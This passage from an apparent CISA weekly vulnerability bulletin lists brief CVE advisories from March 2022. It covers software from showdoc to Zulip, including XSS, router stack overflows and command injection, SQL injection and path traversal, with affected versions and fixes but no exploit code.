star7th — showdoc Stored XSS viva axd and cshtml file upload in star7th/showdoc in GitHub repository star7th/showdoc prior to v2.10.4. 2022-03-15 not yet calculated CVE-2022-0945
CONFIRM
MISC
star7th — showdoc Stored XSS viva .properties file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-14 not yet calculated CVE-2022-0960
CONFIRM
MISC
star7th — showdoc Stored XSS via File Upload in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.4.10. 2022-03-15 not yet calculated CVE-2022-0966
MISC
CONFIRM
star7th — showdoc
 
Stored XSS viva .webma file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-14 not yet calculated CVE-2022-0962
MISC
CONFIRM
star7th — showdoc
 
Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0942
MISC
CONFIRM
stb_trutype.h — stb_trutype.h stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function stbtt__find_table at stb_truetype.h. 2022-03-17 not yet calculated CVE-2022-25516
MISC
stb_trutype.h — stb_trutype.h stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttULONG() at stb_truetype.h. 2022-03-17 not yet calculated CVE-2022-25515
MISC
stb_trutype.h — stb_trutype.h
 
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttUSHORT() at stb_truetype.h. 2022-03-17 not yet calculated CVE-2022-25514
MISC
stormshield — network_security
 
In Stormshield Network Security (SNS) before 3.7.25, 3.8.x through 3.11.x before 3.11.13, 4.x before 4.2.10, and 4.3.x before 4.3.5, a flood of connections to the SSLVPN service might lead to saturation of the loopback interface. This could result in the blocking of almost all network traffic, making the firewall unreachable. An attacker could exploit this via forged and properly timed traffic to cause a denial of service. 2022-03-15 not yet calculated CVE-2022-23989
MISC
suse — linux_enterprise_server
 
A Insecure Temporary File vulnerability in grub-once of grub2 in SUSE Linux Enterprise Server 15 SP4, openSUSE Factory allows local attackers to truncate arbitrary files. This issue affects: SUSE Linux Enterprise Server 15 SP4 grub2 versions prior to 2.06-150400.7.1. SUSE openSUSE Factory grub2 versions prior to 2.06-18.1. 2022-03-16 not yet calculated CVE-2021-46705
CONFIRM
sylius — sylius Sylius is an open source eCommerce platform. Prior to versions 1.10.11 and 1.11.2, the reset password token was not set to null after the password was changed. The same token could be used several times, which could result in leak of the existing token and unauthorized password change. The issue is fixed in versions 1.10.11 and 1.11.2. As a workaround, overwrite the `Sylius\Bundle\ApiBundle\CommandHandler\ResetPasswordHandler` class with code provided by the maintainers and register it in a container. More information about this workaround is available in the GitHub Security Advisory. 2022-03-14 not yet calculated CVE-2022-24743
MISC
CONFIRM
MISC
sylius — sylius Sylius is an open source eCommerce platform. In versions prior to 1.9.10, 1.10.11, and 1.11.2, it is possible to upload an SVG file containing cross-site scripting (XSS) code in the admin panel. In order to perform a XSS attack, the file itself has to be open in a new card or loaded outside of the IMG tag. The problem applies both to the files opened on the admin panel and shop pages. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. As a workaround, require a library that adds on-upload file sanitization and overwrite the service before writing the file to the filesystem. The GitHub Security Advisory contains more specific information about the workaround. 2022-03-14 not yet calculated CVE-2022-24749
CONFIRM
MISC
MISC
MISC
sylius — sylius
 
Sylius is an open source eCommerce platform. Prior to versions 1.9.10, 1.10.11, and 1.11.2, it is possible for a page controlled by an attacker to load the website within an iframe. This will enable a clickjacking attack, in which the attacker’s page overlays the target application’s interface with a different interface provided by the attacker. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. A workaround is available. Every response from app should have an X-Frame-Options header set to: “sameorigin“. To achieve that, add a new `subscriber` in the app. 2022-03-14 not yet calculated CVE-2022-24733
CONFIRM
MISC
MISC
MISC
sylius — sylius
 
Sylius is an open source eCommerce platform. Prior to versions 1.9.10, 1.10.11, and 1.11.2, any other user can view the data if browser tab remains unclosed after log out. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. A workaround is available. The application must strictly redirect to login page even browser back button is pressed. Another possibility is to set more strict cache policies for restricted content. 2022-03-14 not yet calculated CVE-2022-24742
MISC
CONFIRM
MISC
MISC
sylius — sylius
 
SyliusGridBundle is a package of generic data grids for Symfony applications. Prior to versions 1.10.1 and 1.11-rc2, values added at the end of query sorting were passed directly to the database. The maintainers do not know if this could lead to direct SQL injections but took steps to remediate the vulnerability. The issue is fixed in versions 1.10.1 and 1.11-rc2. As a workaround, overwrite the`Sylius\Component\Grid\Sorting\Sorter.php` class and register it in the container. More information about this workaround is available in the GitHub Security Advisory. 2022-03-15 not yet calculated CVE-2022-24752
MISC
CONFIRM
MISC
MISC
MISC
syltek — syltek
 
Syltek application before its 10.22.00 version, does not correctly check that a product ID has a valid payment associated to it. This could allow an attacker to forge a request and bypass the payment system by marking items as payed without any verification. 2022-03-18 not yet calculated CVE-2021-4031
CONFIRM
sync_qcloud_cos — sync_qcloud_cos
 
The Sync QCloud COS WordPress plugin before 2.0.1 does not escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0659
MISC
sysend.js — sysend.js
 
sysend.js is a library that allows a user to send messages between pages that are open in the same browser. Users that use cross-origin communication may have their communications intercepted. Impact is limited by the communication occurring in the same browser. This issue has been patched in sysend.js version 1.10.0. The only currently known workaround is to avoid sending communications that a user does not want to have intercepted via sysend messages. 2022-03-14 not yet calculated CVE-2022-24762
CONFIRM
MISC
MISC
MISC
taocms — taocms
 
taocms v3.0.2 allows attackers to execute code injection via arbitrarily editing the .htaccess file. 2022-03-18 not yet calculated CVE-2022-25578
MISC
MISC
team_circle_image_slider_with_lightbox — team_circle_image_slider_with_lightbox
 
The Team Circle Image Slider With Lightbox WordPress plugin before 1.0.16 does not sanitize and escape the order_pos parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 2022-03-14 not yet calculated CVE-2022-0648
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the deviceId parameter in the saveparentcontrolinfo function. 2022-03-18 not yet calculated CVE-2022-25428
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25427
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a buffer overflow via the time parameter in the saveparentcontrolinfo function. 2022-03-18 not yet calculated CVE-2022-25429
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain multiple stack overflows via the NPTR, V12, V10 and V11 parameter in the Formsetqosband function. 2022-03-18 not yet calculated CVE-2022-25431
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the urls parameter in the saveparentcontrolinfo function. 2022-03-18 not yet calculated CVE-2022-25433
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the firewallen parameter in the SetFirewallCfg function. 2022-03-18 not yet calculated CVE-2022-25434
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetVirtualServerCfg function. 2022-03-18 not yet calculated CVE-2022-25437
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetStaticRoutecfg function. 2022-03-18 not yet calculated CVE-2022-25435
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the SetIPTVCfg function. 2022-03-18 not yet calculated CVE-2022-25438
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function. 2022-03-18 not yet calculated CVE-2022-25455
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedstarttime parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25446
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the day parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25448
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the deviceId parameter in the saveParentControlInfo function. 2022-03-18 not yet calculated CVE-2022-25449
MISC
tenda — routers Tenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetVirtualServerCfg function. 2022-03-18 not yet calculated CVE-2022-25450
MISC
tenda — routers Tenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the setstaticroutecfg function. 2022-03-18 not yet calculated CVE-2022-25451
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the URLs parameter in the saveParentControlInfo function. 2022-03-18 not yet calculated CVE-2022-25452
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the saveParentControlInfo function. 2022-03-18 not yet calculated CVE-2022-25453
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the loginpwd parameter in the SetFirewallCfg function. 2022-03-18 not yet calculated CVE-2022-25454
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the security_5g parameter in the WifiBasicSet function. 2022-03-18 not yet calculated CVE-2022-25456
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function. 2022-03-18 not yet calculated CVE-2022-25439
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the PowerSaveSet function. 2022-03-18 not yet calculated CVE-2022-25445
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function. 2022-03-18 not yet calculated CVE-2022-25457
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the cmdinput parameter in the exeCommand function. 2022-03-18 not yet calculated CVE-2022-25458
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the S1 parameter in the SetSysTimeCfg function. 2022-03-18 not yet calculated CVE-2022-25459
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the endip parameter in the SetPptpServerCfg function. 2022-03-18 not yet calculated CVE-2022-25460
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the vlanid parameter in the SetIPTVCfg function. 2022-03-18 not yet calculated CVE-2022-25441
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function. 2022-03-18 not yet calculated CVE-2022-25440
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25447
MISC
tenda — routers
 
Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the startip parameter in the SetPptpServerCfg function. 2022-03-18 not yet calculated CVE-2022-25461
MISC
tibco — multiple_products
 
The Server component of TIBCO Software Inc.’s TIBCO JasperReports Library, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server for AWS Marketplace, TIBCO JasperReports Server for ActiveMatrix BPM, and TIBCO JasperReports Server for Microsoft Azure contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. Affected releases are TIBCO Software Inc.’s TIBCO JasperReports Library: version 7.9.0, TIBCO JasperReports Library for ActiveMatrix BPM: version 7.9.0, TIBCO JasperReports Server: versions 7.9.0 and 7.9.1, TIBCO JasperReports Server for AWS Marketplace: versions 7.9.0 and 7.9.1, TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.9.0 and 7.9.1, and TIBCO JasperReports Server for Microsoft Azure: version 7.9.1. 2022-03-15 not yet calculated CVE-2022-22771
CONFIRM
CONFIRM
tiny_file_manager — tiny_file_manager
 
A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution. 2022-03-15 not yet calculated CVE-2021-45010
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
tinyfilemanager — tinyfilemanager
 
Path Traversal in GitHub repository prasathmani/tinyfilemanager prior to 2.4.7. 2022-03-17 not yet calculated CVE-2022-1000
MISC
CONFIRM
totlink — routers
 
Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function NTPSyncWithHost. This vulnerability allows attackers to execute arbitrary commands via the host_time parameter. 2022-03-15 not yet calculated CVE-2022-26214
MISC
totolink — firmware
 
Totolink X5000R_Firmware v9.1.0u.6118_B20201102 was discovered to contain a command injection vulnerability in the function setNtpCfg, via the tz parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26213
MISC
totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUploadSetting, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26209
MISC
totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setDiagnosisCfg, via the ipDoamin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26207
MISC
totolink — routers Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6rd function via the relay6rd parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27003
MISC
totolink — routers Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6in4 function via the remote6in4 parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27004
MISC
totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function CloudACMunualUpdate, via the deviceMac and deviceName parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26211
MISC
totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setLanguageCfg, via the langType parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26206
MISC
totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setWebWlanIdx, via the webWlanIdx parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26208
MISC
totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUpgradeFW, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26210
MISC
totolink — routers
 
Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the setWanCfg function via the hostName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27005
MISC
totolink — routers
 
Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setDeviceName, via the deviceMac and deviceName parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26212
MISC
unisoc — chipset
 
The UNISOC chipset through 2022-03-15 allows attackers to obtain remote control of a mobile phone, e.g., to obtain sensitive information from text messages or the device’s screen, record video of the device’s physical environment, or modify data. 2022-03-18 not yet calculated CVE-2022-27250
MISC
veeam — agent_for_windows
 
Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with local system privileges. 2022-03-17 not yet calculated CVE-2022-26503
MISC
MISC
veeam — backup_and_replication **REJECT** Veeam Backup & Replication 10.x and 11.x has an Untrusted Search Path. 2022-03-18 not yet calculated CVE-2022-26502
veeam — backup_and_replication Veeam Backup & Replication 10.x and 11.x has Incorrect Access Control (issue 1 of 2). 2022-03-17 not yet calculated CVE-2022-26501
MISC
MISC
veeam — backup_and_replication Improper limitation of path names in Veeam Backup & Replication 9.5U3, 9.5U4,10.x, and 11.x allows remote authenticated users access to internal API functions that allows attackers to upload and execute arbitrary code. 2022-03-17 not yet calculated CVE-2022-26500
MISC
MISC
veeam — backup_and_replication
 
Improper authentication in Veeam Backup & Replication 9.5U3, 9.5U4,10.x and 11.x component used for Microsoft System Center Virtual Machine Manager (SCVMM) allows attackers execute arbitrary code via Veeam.Backup.PSManager.exe 2022-03-17 not yet calculated CVE-2022-26504
MISC
MISC
vim — vim
 
Heap-based Buffer Overflow occurs in vim in GitHub repository vim/vim prior to 8.2.4563. 2022-03-14 not yet calculated CVE-2022-0943
MISC
CONFIRM
volto — volto
 
Volto is a ReactJS-based frontend for the Plone Content Management System. Between versions 14.0.0-alpha.5 and 15.0.0-alpha.0, a user could have their authentication cookie replaced with an authentication cookie from another user, effectively giving them control of the other user’s account and privileges. This occurs when using an outdated version of the `react-cookie` library and a server is under high load. A proof of concept does not currently exist, but it is possible for this issue to occur in the wild. The patch and fix is present in Volto 15.0.0-alpha.0. As a workaround, one may manually upgrade the `react-cookie` package to 4.1.1 and then override all Volto components that use this library. 2022-03-14 not yet calculated CVE-2022-24740
CONFIRM
MISC
voting_contest — voting_contest
 
The WP Voting Contest WordPress plugin through 2.1 does not sanitise and escape the post_id parameter before outputting it back in the response via the wpvc_social_share_icons AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting issue 2022-03-14 not yet calculated CVE-2022-0321
MISC
waitress — waitress
 
Waitress is a Web Server Gateway Interface server for Python 2 and 3. When using Waitress versions 2.1.0 and prior behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends. This would allow requests to be smuggled via the front-end proxy to waitress and later behavior. There are two classes of vulnerability that may lead to request smuggling that are addressed by this advisory: The use of Python’s `int()` to parse strings into integers, leading to `+10` to be parsed as `10`, or `0x01` to be parsed as `1`, where as the standard specifies that the string should contain only digits or hex digits; and Waitress does not support chunk extensions, however it was discarding them without validating that they did not contain illegal characters. This vulnerability has been patched in Waitress 2.1.1. A workaround is available. When deploying a proxy in front of waitress, turning on any and all functionality to make sure that the request matches the RFC7230 standard. Certain proxy servers may not have this functionality though and users are encouraged to upgrade to the latest version of waitress instead. 2022-03-17 not yet calculated CVE-2022-24761
MISC
CONFIRM
MISC
wavlink — routers A vulnerability is in the ‘live_mfg.html’ page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router. 2022-03-17 not yet calculated CVE-2021-44260
MISC
wavlink — routers
 
A vulnerability is in the ‘wx.html’ page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When an unauthorized user accesses this page directly, it connects to this device as a friend of the device owner. 2022-03-17 not yet calculated CVE-2021-44259
MISC
whale_browser — whale_browser Whale Bridge, a default extension in Whale browser before 3.12.129.18, allowed to receive any SendMessage request from the content script itself that could lead to controlling Whale Bridge if the rendering process compromises. 2022-03-17 not yet calculated CVE-2022-24074
CONFIRM
whale_browser — whale_browser Whale browser before 3.12.129.18 allowed extensions to replace JavaScript files of the HWP viewer website which could access to local HWP files. When the HWP files were opened, the replaced script could read the files. 2022-03-17 not yet calculated CVE-2022-24075
CONFIRM
whale_browser — whale_browser
 
The devtools API in Whale browser before 3.12.129.18 allowed extension developers to inject arbitrary JavaScript into the extension store web page via devtools.inspectedWindow, leading to extensions downloading and uploading when users open the developer tool. 2022-03-17 not yet calculated CVE-2022-24072
CONFIRM
whale_browser — whale_browser
 
The Web Request API in Whale browser before 3.12.129.18 allowed to deny access to the extension store or redirect to any URL when users access the store. 2022-03-17 not yet calculated CVE-2022-24073
CONFIRM
wireapp — wire-server
 
wire-server provides back end services for Wire, an open source messenger. In versions of wire-server prior to the 2022-01-27 release, it was possible to craft DSA Signatures to bypass SAML SSO and impersonate any Wire user with SAML credentials. In teams with SAML, but without SCIM, it was possible to create new accounts with fake SAML credentials. Under certain conditions that can be established by an attacker, an upstream library for parsing, rendering, signing, and validating SAML XML data was accepting public keys as trusted that were provided by the attacker in the signature. As a consequence, the attacker could login as any user in any Wire team with SAML SSO enabled. If SCIM was not enabled, the attacker could also create new users with new SAML NameIDs. In order to exploit this vulnerability, the attacker needs to know the SSO login code (distributed to all team members with SAML credentials and visible in the Team Management app), the SAML EntityID identifying the IdP (a URL not considered sensitive, but usually hard to guess, also visible in Team Management), and the SAML NameID of the user (usually an email address or a nick). The issue has been fixed in wire-server `2022-01-27` and is already deployed on all Wire managed services. On premise instances of wire-server need to be updated to `2022-01-27`, so that their backends are no longer affected. There are currently no known workarounds. More detailed information about how to reproduce the vulnerability and mitigation strategies is available in the GitHub Security Advisory. 2022-03-16 not yet calculated CVE-2022-23610
MISC
CONFIRM
wp-downloadmanager — wp-downloadmanager
 
Authenticated Reflected Cross-Site Scripting (XSS) vulnerability discovered in WP-DownloadManager WordPress plugin (versions <= 1.68.6). 2022-03-18 not yet calculated CVE-2021-44760
CONFIRM
CONFIRM
wp-downloadmanager — wp-downloadmanager
 
Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions <= 1.68.6). Vvulnerable parameters &download_path, &download_path_url, &download_page_url. 2022-03-18 not yet calculated CVE-2022-25605
CONFIRM
CONFIRM
wp_home_page_menu — qp_home_page_menu
 
The WP Home Page Menu WordPress plugin before 3.1 does not sanitise and escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0684
MISC
CONFIRM
wps_office_version — wps_office_version The installer of WPS Office Version 10.8.0.6186 insecurely load VERSION.DLL (or some other DLLs), allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer. 2022-03-17 not yet calculated CVE-2022-25969
JVN
CONFIRM
wps_office_version — wps_office_version
 
The installer of WPS Office Version 10.8.0.5745 insecurely load shcore.dll, allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer. 2022-03-17 not yet calculated CVE-2022-26081
JVN
CONFIRM
wps_presentation — wps_presentation
 
WPS Presentation 11.8.0.5745 insecurely load d3dx9_41.dll when opening .pps files(‘current directory type’ DLL loading). 2022-03-17 not yet calculated CVE-2022-26511
JVN
CONFIRM
x2crm — x2crm
 
A Cross-Site Scripting (XSS) attack can cause arbitrary code (javascript) to run in a user’s browser while the browser is connected to a trusted website. As the vehicle for the attack, the application targets the users and not the application itself. Additionally, the XSS payload is executed when the user attempts to access any page of the CRM. 2022-03-16 not yet calculated CVE-2021-33853
MISC
xbit — xbit A cross-site scripting vulnerability is present in Xbtit 3.1. The stored XSS vulnerability occurs because /ajaxchat/sendChatData.php does not properly validate the value of the “n” (POST) parameter. Through this vulnerability, an attacker is capable to execute malicious JavaScript code. 2022-03-16 not yet calculated CVE-2021-45822
MISC
MISC
MISC
xbit — xbit
 
A blind SQL injection vulnerability exists in Xbtit 3.1 via the sid parameter in ajaxchat/getHistoryChatData.php file that is accessible by a registered user. As a result, a malicious user can extract sensitive data such as usernames and passwords and in some cases use this vulnerability in order to get a remote code execution on the remote web server. 2022-03-16 not yet calculated CVE-2021-45821
MISC
MISC
MISC
xebd — accel-ppp
 
The telnet_input_char function in opt/src/accel-pppd/cli/telnet.c suffers from a memory corruption vulnerability, whereby user input cmdline_len is copied into a fixed buffer b->buf without any bound checks. If the server connects with a malicious client, crafted client requests can remotely trigger this vulnerability. 2022-03-16 not yet calculated CVE-2022-0982
MISC
yokogawa — widefield3
 
In Yokogawa WideField3 R1.01 – R4.03, a buffer overflow could be caused when a user loads a maliciously crafted project file. 2022-03-18 not yet calculated CVE-2020-16232
CONFIRM
CONFIRM
zero_spam — zero_spam
 
The WordPress Zero Spam WordPress plugin before 5.2.11 does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection 2022-03-14 not yet calculated CVE-2022-0254
CONFIRM
MISC
CONFIRM
zulip — zulip
 
Zulip is an open source group chat application. Starting with version 4.0 and prior to version 4.11, Zulip is vulnerable to a race condition during account deactivation, where a simultaneous access by the user being deactivated may, in rare cases, allow continued access by the deactivated user. A patch is available in version 4.11 on the 4.x branch and version 5.0-rc1 on the 5.x branch. Upgrading to a fixed version will, as a side effect, deactivate any cached sessions that may have been leaked through this bug. There are currently no known workarounds. 2022-03-16 not yet calculated CVE-2022-24751
MISC
MISC
CONFIRM
Back to top

This product is provided subject to this Notification and this Privacy & Use policy.

Please share your thoughts.

CISA recently updated an anonymous product survey;they’d welcome your feedback.